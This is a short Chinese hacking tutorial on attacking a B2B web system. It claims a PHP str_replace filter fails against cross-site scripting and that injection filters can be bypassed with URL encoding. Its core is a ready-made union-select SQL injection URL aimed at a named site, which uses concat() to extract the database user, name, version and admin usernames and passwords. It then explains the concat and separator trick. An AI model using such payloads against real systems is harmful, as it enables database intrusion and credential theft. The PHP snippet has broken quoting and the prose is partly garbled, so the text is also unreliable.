对B2B系统的解析[网络技术]

用PHP的str_replace(array("\r\n,"\n"," "),array("<br>","<br>"," "),$_POST[''questiondes]),这种过滤关于跨站没有任何作用,可以用htmlspecialchars,htmentite来过滤;关于防注入程序,我们可以用URL编码来绕过的;

   一个最简单的concat:

看这里http://www.110hack.com/product_info.php?id=33+and+1=2+union+select+1,concat(0x757365723A,user(),0x5c,0x64617461626173653A,database(),0x5c,0x64617461626173652076657273696F6E3A,version()),3,4,5,concat(username,0x5c,password)+from+admin
先看2号显示位,concat(database(),0x5c,user(),0x5c,version())
当我们查询很多个东西的时刻,我们便可以用到concat,普通用在显示位只有一个的情形,假如直接把显示位上放上要查询的东西,一次只能查询一个,这样很麻烦,所以这个concat就有了用武之地,把几个东西结合起来.不管你查询语句是什么,都可以用concat套进去,简单的理解可以当作一种等级关系?反正理解不了的话可以这么看,hex()的括号可以括全部的东西,concat()的括号可以括别的东西.
不过concat有个缺陷就是结合起来查的东西都是不被分割的,也就是连成一片的,我们需求用特定标识来脱离,比方0x5f、0x5c、0xff等等